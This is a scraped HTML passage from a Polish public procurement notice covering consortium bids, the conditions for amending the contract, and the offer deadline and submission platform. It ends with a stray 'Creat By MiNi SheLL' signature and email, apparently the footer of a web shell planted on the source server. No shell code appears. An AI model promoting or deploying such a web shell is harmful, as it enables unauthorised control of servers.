wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty, przez dwa lub więcej<br/>podmiotów np. konsorcjum firm, spółkę cywilną), pod warunkiem, że taka oferta będzie spełniać następujące wymagania:<br/>1) Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Wymóg powyższy nie dotyczy spółki cywilnej,<br/>o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź<br/>wszyscy wspólnicy podpiszą ofertę i załączą do oferty umowę spółki cywilnej.<br/>2) Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo. Wymóg powyższy nie dotyczy<br/>spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty<br/>umowy spółki bądź wszyscy wspólnicy podpiszą ofertę i załączą do oferty umowę spółki cywilnej; Uwaga: Pełnomocnictwo,<br/>o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy podmiotów składających<br/>wspólnie ofertę.<br/>3) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub pełnomocnika Wykonawcy, jeśli został ustanowiony),<br/>4) Oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w Części VII ust. 1 pkt 1) SWZ<br/>Wykonawcy składający ofertę wspólną mogą złożyć łącznie, pod warunkiem, że oświadczenie to zostanie podpisane w<br/>imieniu wszystkich podmiotów występujących wspólnie (przez pełnomocnika) lub przez wszystkie podmioty składające<br/>ofertę wspólną; Zamawiający dopuszcza również złożenie Oświadczenia przez każdego z Wykonawców odrębnie,<br/>5) Wszelka korespondencja prowadzona będzie wyłącznie z Wykonawcą występującym jako pełnomocnik pozostałych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 6 do SWZ. Umowa zostanie<br/>zawarta na podstawie złożonej oferty Wykonawcy. 2. Zamawiający przewiduje możliwość zmian postanowień zawartej<br/>umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej<br/>jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 2.1. Zmiana<br/>terminu realizacji przedmiotu umowy: 1. Zmiany spowodowane warunkami atmosferycznymi, w szczególności klęski<br/>żywiołowe, 2. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: a)<br/>wstrzymanie robót przez Zamawiającego, b) konieczność realizacji zamówień zamiennych. 3. Inne przyczyny zewnętrzne<br/>niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac. W przypadku wystąpienia<br/>którejkolwiek z okoliczności wymienionych w pkt 1 – 3 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o<br/>czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych<br/>okoliczności. 2.2. Zmiana sposobu spełnienia świadczenia: 1. Zmiany technologiczne, w szczególności: a) konieczność<br/>zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji<br/>projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem<br/>projektu ( w tym roboty zamienne), b) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych<br/>lub materiałowych ze względu na zmiany obowiązującego prawa. Zmiany wskazywane w lit b) będą wprowadzane wyłącznie<br/>w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia<br/>wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. Każda ze<br/>wskazywanych w lit a – b) zmian może być powiązana z obniżeniem wynagrodzenia na zasadach określonych przez Strony.<br/>2.3. Zmiany osobowe:- zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się<br/>co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych<br/>ustawach, a także SWZ, będzie wymagała również zaakceptowania przez Zamawiającego. 2.4. Pozostałe zmiany: a)<br/>zmiana obowiązującej stawki VAT: - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po<br/>stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie<br/>podatku VAT zapłaconego przez Wykonawcę, - jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów<br/>wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę<br/>stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę, b) rezygnacja przez Zamawiającego z realizacji<br/>części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy<br/>czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w<br/>związku z wynikającymi z umowy planowanymi świadczeniami, c) zmiana sposobu rozliczania umowy lub dokonywania<br/>płatności na rzecz Wykonawcy,<br/>d) zmiana Podwykonawcy po uprzedniej zgodzie Zamawiającego. Wszystkie powyższe postanowienia stanowią katalog<br/>zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>Wymienione powyższe możliwości wprowadzenia zmian są uprawnieniem a nie obowiązkiem Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-28 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę należy złożyć na platformie pod adresem https://komr.ezamawiajacy.pl w zakładce &#34;OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-28 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com